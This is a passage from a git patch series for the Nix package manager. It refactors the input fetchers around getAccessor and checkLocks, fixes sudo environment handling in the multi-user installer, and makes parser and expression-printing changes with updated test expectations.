+    // Note: we convert std::filesystem::path to Path because the
+    // former is not hashable on libc++.
+    Path absPath = makeAbsPath(path);
 
     {
         auto cache(_cache.lock());

From 0e07f81d2ba532e140539e91b57d6f85c952fee2 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 22:17:24 +0100
Subject: [PATCH 568/654] Fetcher cleanups

* Convert all InputScheme::fetch() methods to getAccessor().

* Add checkLocks() method for checking lock attributes.

* Rename fetch() to fetchToStore().
---
 src/libexpr/flake/flakeref.cc         |   2 +-
 src/libexpr/primops/fetchMercurial.cc |   3 +-
 src/libexpr/primops/fetchTree.cc      |   2 +-
 src/libfetchers/fetchers.cc           | 107 +++++++++++++++-----------
 src/libfetchers/fetchers.hh           |  25 +++++-
 src/libfetchers/git.cc                |   2 -
 src/libfetchers/github.cc             |   2 -
 src/libfetchers/indirect.cc           |   2 +-
 src/libfetchers/mercurial.cc          |  26 ++++---
 src/libfetchers/path.cc               |   6 +-
 src/nix/flake.cc                      |   2 +-
 src/nix/registry.cc                   |   4 +-
 12 files changed, 112 insertions(+), 71 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..6fe64fd72 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -274,7 +274,7 @@ FlakeRef FlakeRef::fromAttrs(const fetchers::Attrs & attrs)
 
 std::pair FlakeRef::fetchTree(ref store) const
 {
-    auto [storePath, lockedInput] = input.fetch(store);
+    auto [storePath, lockedInput] = input.fetchToStore(store);
     return {std::move(storePath), FlakeRef(std::move(lockedInput), subdir)};
 }
 
diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc
index bb029b5b3..bfc19115a 100644
--- a/src/libexpr/primops/fetchMercurial.cc
+++ b/src/libexpr/primops/fetchMercurial.cc
@@ -64,8 +64,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a
     if (rev) attrs.insert_or_assign("rev", rev->gitRev());
     auto input = fetchers::Input::fromAttrs(std::move(attrs));
 
-    // FIXME: use name
-    auto [storePath, input2] = input.fetch(state.store);
+    auto [storePath, input2] = input.fetchToStore(state.store);
 
     auto attrs2 = state.buildBindings(8);
     state.mkStorePathString(storePath, attrs2.alloc(state.sOutPath));
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index cfedfa6c4..5061e40fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -182,7 +182,7 @@ static void fetchTree(
 
     state.checkURI(input.toURLString());
 
-    auto [storePath, input2] = input.fetch(state.store);
+    auto [storePath, input2] = input.fetchToStore(state.store);
 
     state.allowPath(storePath);
 
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 363ad018e..483796f0b 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -161,7 +161,7 @@ bool Input::contains(const Input & other) const
     return false;
 }
 
-std::pair Input::fetch(ref store) const
+std::pair Input::fetchToStore(ref store) const
 {
     if (!scheme)
         throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
@@ -186,56 +186,85 @@ std::pair Input::fetch(ref store) const
 
     auto [storePath, input] = [&]() -> std::pair {
         try {
-            return scheme->fetch(store, *this);
+            auto [accessor, final] = getAccessorUnchecked(store);
+
+            auto storePath = nix::fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, final.getName());
+
+            auto narHash = store->queryPathInfo(storePath)->narHash;
+            final.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+            scheme->checkLocks(*this, final);
+
+            return {storePath, final};
         } catch (Error & e) {
             e.addTrace({}, "while fetching the input '%s'", to_string());
             throw;
         }
     }();
 
-    auto narHash = store->queryPathInfo(storePath)->narHash;
-    input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
-
-    if (auto prevNarHash = getNarHash()) {
-        if (narHash != *prevNarHash)
-            throw Error((unsigned int) 102, "NAR hash mismatch in input '%s' (%s), expected '%s', got '%s'",
-                to_string(),
-                store->printStorePath(storePath),
-                prevNarHash->to_string(HashFormat::SRI, true),
-                narHash.to_string(HashFormat::SRI, true));
-    }
-
-    if (auto prevLastModified = getLastModified()) {
-        if (input.getLastModified() != prevLastModified)
-            throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
-                input.to_string(), *prevLastModified);
-    }
-
-    if (auto prevRev = getRev()) {
-        if (input.getRev() != prevRev)
-            throw Error("'rev' attribute mismatch in input '%s', expected %s",
-                input.to_string(), prevRev->gitRev());
-    }
-
-    if (auto prevRevCount = getRevCount()) {
-        if (input.getRevCount() != prevRevCount)
-            throw Error("'revCount' attribute mismatch in input '%s', expected %d",
-                input.to_string(), *prevRevCount);
-    }
-
     return {std::move(storePath), input};
 }
 
+void InputScheme::checkLocks(const Input & specified, const Input & final) const
+{
+    if (auto prevNarHash = specified.getNarHash()) {
+        if (final.getNarHash() != prevNarHash) {
+            if (final.getNarHash())
+                throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got '%s'",
+                    specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true), final.getNarHash()->to_string(HashFormat::SRI, true));
+            else
+                throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got none",
+                    specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true));
+        }
+    }
+
+    if (auto prevLastModified = specified.getLastModified()) {
+        if (final.getLastModified() != prevLastModified)
+            throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
+                final.to_string(), *prevLastModified);
+    }
+
+    if (auto prevRev = specified.getRev()) {
+        if (final.getRev() != prevRev)
+            throw Error("'rev' attribute mismatch in input '%s', expected %s",
+                final.to_string(), prevRev->gitRev());
+    }
+
+    if (auto prevRevCount = specified.getRevCount()) {
+        if (final.getRevCount() != prevRevCount)
+            throw Error("'revCount' attribute mismatch in input '%s', expected %d",
+                final.to_string(), *prevRevCount);
+    }
+}
+
 std::pair, Input> Input::getAccessor(ref store) const
 {
     try {
-        return scheme->getAccessor(store, *this);
+        auto [accessor, final] = getAccessorUnchecked(store);
+
+        scheme->checkLocks(*this, final);
+
+        return {accessor, std::move(final)};
     } catch (Error & e) {
         e.addTrace({}, "while fetching the input '%s'", to_string());
         throw;
     }
 }
 
+std::pair, Input> Input::getAccessorUnchecked(ref store) const
+{
+    // FIXME: cache the accessor
+
+    if (!scheme)
+        throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
+
+    auto [accessor, final] = scheme->getAccessor(store, *this);
+
+    accessor->fingerprint = scheme->getFingerprint(store, final);
+
+    return {accessor, std::move(final)};
+}
+
 Input Input::applyOverrides(
     std::optional ref,
     std::optional rev) const
@@ -372,18 +401,6 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
     throw Error("do not know how to clone input '%s'", input.to_string());
 }
 
-std::pair InputScheme::fetch(ref store, const Input & input)
-{
-    auto [accessor, input2] = getAccessor(store, input);
-    auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
-    return {storePath, input2};
-}
-
-std::pair, Input> InputScheme::getAccessor(ref store, const Input & input) const
-{
-    throw UnimplementedError("InputScheme must implement fetch() or getAccessor()");
-}
-
 std::optional InputScheme::experimentalFeature() const
 {
     return {};
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 472fba6f4..cd11f9eae 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -80,10 +80,21 @@ public:
      * Fetch the entire input into the Nix store, returning the
      * location in the Nix store and the locked input.
      */
-    std::pair fetch(ref store) const;
+    std::pair fetchToStore(ref store) const;
 
+    /**
+     * Return an InputAccessor that allows access to files in the
+     * input without copying it to the store. Also return a possibly
+     * unlocked input.
+     */
     std::pair, Input> getAccessor(ref store) const;
 
+private:
+
+    std::pair, Input> getAccessorUnchecked(ref store) const;
+
+public:
+
     Input applyOverrides(
         std::optional ref,
         std::optional rev) const;
@@ -173,9 +184,7 @@ struct InputScheme
         std::string_view contents,
         std::optional commitMsg) const;
 
-    virtual std::pair fetch(ref store, const Input & input);
-
-    virtual std::pair, Input> getAccessor(ref store, const Input & input) const;
+    virtual std::pair, Input> getAccessor(ref store, const Input & input) const = 0;
 
     /**
      * Is this `InputScheme` part of an experimental feature?
@@ -202,6 +211,14 @@ struct InputScheme
      */
     virtual bool isLocked(const Input & input) const
     { return false; }
+
+    /**
+     * Check the locking attributes in `final` against
+     * `specified`. E.g. if `specified` has a `rev` attribute, then
+     * `final` must have the same `rev` attribute. Throw an exception
+     * if there is a mismatch.
+     */
+    virtual void checkLocks(const Input & specified, const Input & final) const;
 };
 
 void registerInputScheme(std::shared_ptr && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 87d114276..25eabb1dc 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -761,8 +761,6 @@ struct GitInputScheme : InputScheme
             ? getAccessorFromCommit(store, repoInfo, std::move(input))
             : getAccessorFromWorkdir(store, repoInfo, std::move(input));
 
-        accessor->fingerprint = final.getFingerprint(store);
-
         return {accessor, std::move(final)};
     }
 
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index a48c99a0b..d9d348756 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -275,8 +275,6 @@ struct GitArchiveInputScheme : InputScheme
 
         accessor->setPathDisplay("«" + input.to_string() + "»");
 
-        accessor->fingerprint = input.getFingerprint(store);
-
         return {accessor, input};
     }
 
diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc
index 002c0c292..3f21445e1 100644
--- a/src/libfetchers/indirect.cc
+++ b/src/libfetchers/indirect.cc
@@ -97,7 +97,7 @@ struct IndirectInputScheme : InputScheme
         return input;
     }
 
-    std::pair fetch(ref store, const Input & input) override
+    std::pair, Input> getAccessor(ref store, const Input & input) const override
     {
         throw Error("indirect input '%s' cannot be fetched directly", input.to_string());
     }
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index a5f55a44e..a2702338f 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -6,8 +6,8 @@
 #include "tarfile.hh"
 #include "store-api.hh"
 #include "url-parts.hh"
+#include "fs-input-accessor.hh"
 #include "posix-source-accessor.hh"
-
 #include "fetch-settings.hh"
 
 #include 
@@ -161,9 +161,9 @@ struct MercurialInputScheme : InputScheme
         return {isLocal, isLocal ? url.path : url.base};
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    StorePath fetchToStore(ref store, Input & input) const
     {
-        Input input(_input);
+        auto origRev = input.getRev();
 
         auto name = input.getName();
 
@@ -218,7 +218,7 @@ struct MercurialInputScheme : InputScheme
                     FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {},
                     filter);
 
-                return {std::move(storePath), input};
+                return storePath;
             }
         }
 
@@ -242,13 +242,12 @@ struct MercurialInputScheme : InputScheme
             });
         };
 
-        auto makeResult = [&](const Attrs & infoAttrs, StorePath && storePath)
-            -> std::pair
+        auto makeResult = [&](const Attrs & infoAttrs, const StorePath & storePath) -> StorePath
         {
             assert(input.getRev());
-            assert(!_input.getRev() || _input.getRev() == input.getRev());
+            assert(!origRev || origRev == input.getRev());
             input.attrs.insert_or_assign("revCount", getIntAttr(infoAttrs, "revCount"));
-            return {std::move(storePath), input};
+            return storePath;
         };
 
         if (input.getRev()) {
@@ -329,7 +328,7 @@ struct MercurialInputScheme : InputScheme
             {"revCount", (uint64_t) revCount},
         });
 
-        if (!_input.getRev())
+        if (!origRev)
             getCache()->add(
                 *store,
                 unlockedAttrs,
@@ -347,6 +346,15 @@ struct MercurialInputScheme : InputScheme
         return makeResult(infoAttrs, std::move(storePath));
     }
 
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
+    {
+        Input input(_input);
+
+        auto storePath = fetchToStore(store, input);
+
+        return {makeStorePathAccessor(store, storePath), input};
+    }
+
     bool isLocked(const Input & input) const override
     {
         return (bool) input.getRev();
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..6cc482ebf 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -1,6 +1,8 @@
 #include "fetchers.hh"
 #include "store-api.hh"
 #include "archive.hh"
+#include "fs-input-accessor.hh"
+#include "posix-source-accessor.hh"
 
 namespace nix::fetchers {
 
@@ -102,7 +104,7 @@ struct PathInputScheme : InputScheme
         throw Error("cannot fetch input '%s' because it uses a relative path", input.to_string());
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
         Input input(_input);
         std::string absPath;
@@ -144,7 +146,7 @@ struct PathInputScheme : InputScheme
         }
         input.attrs.insert_or_assign("lastModified", uint64_t(mtime));
 
-        return {std::move(*storePath), input};
+        return {makeStorePathAccessor(store, *storePath), std::move(input)};
     }
 
     std::optional experimentalFeature() const override
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 5fc3f4166..5e4269588 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -1050,7 +1050,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
                     auto storePath =
                         dryRun
                         ? (*inputNode)->lockedRef.input.computeStorePath(*store)
-                        : (*inputNode)->lockedRef.input.fetch(store).first;
+                        : (*inputNode)->lockedRef.input.fetchToStore(store).first;
                     if (json) {
                         auto& jsonObj3 = jsonObj2[inputName];
                         jsonObj3["path"] = store->printStorePath(storePath);
diff --git a/src/nix/registry.cc b/src/nix/registry.cc
index 0346ec1e0..812429240 100644
--- a/src/nix/registry.cc
+++ b/src/nix/registry.cc
@@ -188,7 +188,9 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand
         auto ref = parseFlakeRef(url);
         auto lockedRef = parseFlakeRef(locked);
         registry->remove(ref.input);
-        auto [tree, resolved] = lockedRef.resolve(store).input.fetch(store);
+        auto resolved = lockedRef.resolve(store).input.getAccessor(store).second;
+        if (!resolved.isLocked())
+            warn("flake '%s' is not locked", resolved.to_string());
         fetchers::Attrs extraAttrs;
         if (ref.subdir != "") extraAttrs["dir"] = ref.subdir;
         registry->add(ref.input, resolved, extraAttrs);

From 7161ef14a2f26fa4f1be9633de2f423492ee76c7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Tue, 5 Mar 2024 08:07:58 +0100
Subject: [PATCH 569/654] Add a warning against carelessly changing the profile
 version number

Try and prevent the situation of https://github.com/NixOS/nix/issues/10109 to happen again in the future
---
 src/nix/profile.cc | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..2bb29a67b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -222,6 +222,8 @@ struct ProfileManifest
             es[name] = obj;
         }
         nlohmann::json json;
+        // Only upgrade with great care as changing it can break fresh installs
+        // like in https://github.com/NixOS/nix/issues/10109
         json["version"] = 3;
         json["elements"] = es;
         return json;

From 2a3451077677787eae176c72717817ba80738a5e Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Tue, 5 Mar 2024 14:35:05 +0100
Subject: [PATCH 570/654] package.nix: Apply
 OBJC_DISABLE_INITIALIZE_FORK_SAFETY workaround

This was previously already used in the launchd configuration for
nix-daemon.

(cherry picked from commit 855741aea57cd413a5da524169794a6790162d18)
---
 package.nix | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/package.nix b/package.nix
index a90973b4c..fa898e906 100644
--- a/package.nix
+++ b/package.nix
@@ -349,9 +349,15 @@ in {
 
   # Needed for tests if we are not doing a build, but testing existing
   # built Nix.
-  preInstallCheck = lib.optionalString (! doBuild) ''
-    mkdir -p src/nix-channel
-  '';
+  preInstallCheck =
+    lib.optionalString (! doBuild) ''
+      mkdir -p src/nix-channel
+    ''
+    # See https://github.com/NixOS/nix/issues/2523
+    # Occurs often in tests since https://github.com/NixOS/nix/pull/9900
+    + lib.optionalString stdenv.hostPlatform.isDarwin ''
+      export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
+    '';
 
   separateDebugInfo = !stdenv.hostPlatform.isStatic;
 

From 686405ef416955621a89815e07cb64e1ee4f1495 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 6 Mar 2024 22:36:37 +0100
Subject: [PATCH 571/654] Fix sudo in the darwin installer (#10128)

---
 scripts/install-multi-user.sh | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..4d6a1914e 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -69,16 +69,17 @@ readonly PROXY_ENVIRONMENT_VARIABLES=(
     NO_PROXY
 )
 
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
+SUDO_KEPT_ENVIRONMENT_VARIABLES=""
 
 setup_sudo_extra_environment_variables() {
-    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
     for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
         if [ "x${!variable:-}" != "x" ]; then
-            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
-            i=$((i + 1))
+            SUDO_KEPT_ENVIRONMENT_VARIABLES="$SUDO_KEPT_ENVIRONMENT_VARIABLES,$variable"
         fi
     done
+
+    # Required by the darwin installer
+    export SUDO_KEPT_ENVIRONMENT_VARIABLES
 }
 
 setup_sudo_extra_environment_variables
@@ -386,7 +387,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+        sudo --preserve-env="$SUDO_KEPT_ENVIRONMENT_VARIABLES" "$@"
     fi
 }
 

From fe13d4a6e0d286d0ab8fcd8728bd41064dad69d0 Mon Sep 17 00:00:00 2001
From: link2xt 
Date: Wed, 6 Mar 2024 21:55:02 +0000
Subject: [PATCH 572/654] Make search.nixos.org link in quick start clickable

---
 doc/manual/src/quick-start.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md
index 75853ced7..9eb7a3265 100644
--- a/doc/manual/src/quick-start.md
+++ b/doc/manual/src/quick-start.md
@@ -34,7 +34,7 @@ For more in-depth information you are kindly referred to subsequent chapters.
    lolcat: command not found
    ```
 
-1. Search for more packages on  to try them out.
+1. Search for more packages on [search.nixos.org](https://search.nixos.org/) to try them out.
 
 1. Free up storage space:
 

From d384ecd553aa997270b79ee98d02f7cf7e1849e6 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 573/654] keep copies of parser inputs that are in-memory only

the parser modifies its inputs, which means that sharing them between
the error context reporting system and the parser itself can confuse the
reporting system. usually this led to early truncation of error context
reports which, while not dangerous, can be quite confusing.
---
 src/libexpr/eval.cc                              | 16 +++++++++++-----
 .../lang/parse-fail-dup-attrs-1.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-2.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-3.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-4.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-7.err.exp          |  1 +
 .../lang/parse-fail-undef-var-2.err.exp          |  3 ++-
 tests/functional/lang/parse-fail-utf8.err.exp    |  3 ++-
 8 files changed, 20 insertions(+), 7 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 722ff6908..3d22723b3 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2777,9 +2777,12 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv)
 {
-    auto s = make_ref(std::move(s_));
-    s->append("\0\0", 2);
-    return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv);
+    // NOTE this method (and parseStdin) must take care to *fully copy* their input
+    // into their respective Pos::Origin until the parser stops overwriting its input
+    // data.
+    auto s = make_ref(s_);
+    s_.append("\0\0", 2);
+    return parse(s_.data(), s_.size(), Pos::String{.source = s}, basePath, staticEnv);
 }
 
 
@@ -2791,12 +2794,15 @@ Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath
 
 Expr * EvalState::parseStdin()
 {
+    // NOTE this method (and parseExprFromString) must take care to *fully copy* their
+    // input into their respective Pos::Origin until the parser stops overwriting its
+    // input data.
     //Activity act(*logger, lvlTalkative, "parsing standard input");
     auto buffer = drainFD(0);
     // drainFD should have left some extra space for terminators
     buffer.append("\0\0", 2);
-    auto s = make_ref(std::move(buffer));
-    return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
+    auto s = make_ref(buffer);
+    return parse(buffer.data(), buffer.size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
 }
 
 
diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
index 6c3a3510c..ffb5198c1 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:1:3
             2|   y = 456;
             3|   x = 789;
              |   ^
+            4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index fecdece20..4607a5d59 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:9:5
             9|     x = 789;
            10|     inherit (as) x;
              |                 ^
+           11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index fecdece20..4607a5d59 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:9:5
             9|     x = 789;
            10|     inherit (as) x;
              |                 ^
+           11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
index f85ffea51..c98a8f8d0 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
@@ -3,3 +3,4 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3
             2|   services.ssh.port = 22;
             3|   services.ssh.port = 23;
              |   ^
+            4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 98cea9dae..2daddf380 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:6:12
             6|     inherit x;
             7|     inherit x;
              |            ^
+            8|   };
diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp b/tests/functional/lang/parse-fail-undef-var-2.err.exp
index a58d8dca4..393c454dd 100644
--- a/tests/functional/lang/parse-fail-undef-var-2.err.exp
+++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp
@@ -1,5 +1,6 @@
 error: syntax error, unexpected ':', expecting '}'
        at «stdin»:3:13:
             2|
-            3|   f = {x, y :
+            3|   f = {x, y : ["baz" "bar" z "bat"]}: x + y;
              |             ^
+            4|
diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp
index e83abdb9e..1c83f6eb3 100644
--- a/tests/functional/lang/parse-fail-utf8.err.exp
+++ b/tests/functional/lang/parse-fail-utf8.err.exp
@@ -1,4 +1,5 @@
 error: syntax error, unexpected invalid token, expecting end of file
        at «stdin»:1:5:
-            1| 123 
+            1| 123 é 4
              |     ^
+            2|

From 4147ecfb1c51f3fe3b4adcbd4e753fd487dab645 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 574/654] normalize formal order on ExprLambda::show

we already normalize attr order to lexicographic, doing the same for
formals makes sense. doubly so because the order of formals would
otherwise depend on the context of the expression, which is not quite as
useful as one might expect.
---
 doc/manual/rl-next/formal-order.md              | 7 +++++++
 src/libexpr/nixexpr.cc                          | 5 ++++-
 tests/functional/lang/parse-okay-subversion.exp | 2 +-
 3 files changed, 12 insertions(+), 2 deletions(-)
 create mode 100644 doc/manual/rl-next/formal-order.md

diff --git a/doc/manual/rl-next/formal-order.md b/doc/manual/rl-next/formal-order.md
new file mode 100644
index 000000000..12628e318
--- /dev/null
+++ b/doc/manual/rl-next/formal-order.md
@@ -0,0 +1,7 @@
+---
+synopsis: consistent order of lambda formals in printed expressions
+prs: 9874
+---
+
+Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
+This makes printed formals independent of the context they appear in.
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 4b805d710..9a8b9616b 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -149,7 +149,10 @@ void ExprLambda::show(const SymbolTable & symbols, std::ostream & str) const
     if (hasFormals()) {
         str << "{ ";
         bool first = true;
-        for (auto & i : formals->formals) {
+        // the natural Symbol ordering is by creation time, which can lead to the
+        // same expression being printed in two different ways depending on its
+        // context. always use lexicographic ordering to avoid this.
+        for (auto & i : formals->lexicographicOrder(symbols)) {
             if (first) first = false; else str << ", ";
             str << symbols[i.name];
             if (i.def) {
diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp
index 2303932c4..32fbba3c5 100644
--- a/tests/functional/lang/parse-okay-subversion.exp
+++ b/tests/functional/lang/parse-okay-subversion.exp
@@ -1 +1 @@
-({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
+({ db4 ? null, expat, fetchurl, httpServer ? false, httpd ? null, j2sdk ? null, javaSwigBindings ? false, javahlBindings ? false, localServer ? false, openssl ? null, pythonBindings ? false, sslSupport ? false, stdenv, swig ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))

From 1edd6fada53553b89847ac3981ac28025857ca02 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 575/654] report inherit attr errors at the duplicate name

previously we reported the error at the beginning of the binding
block (for plain inherits) or the beginning of the attr list (for
inherit-from), effectively hiding where exactly the error happened.

this also carries over to runtime positions of attributes in sets as
reported by unsafeGetAttrPos. we're not worried about this changing
observable eval behavior because it *is* marked unsafe, and the new
behavior is much more useful.
---
 doc/manual/rl-next/inherit-error-positions.md |  6 +++++
 src/libexpr/parser.y                          | 25 ++++++++++---------
 .../lang/eval-okay-inherit-attr-pos.exp       |  1 +
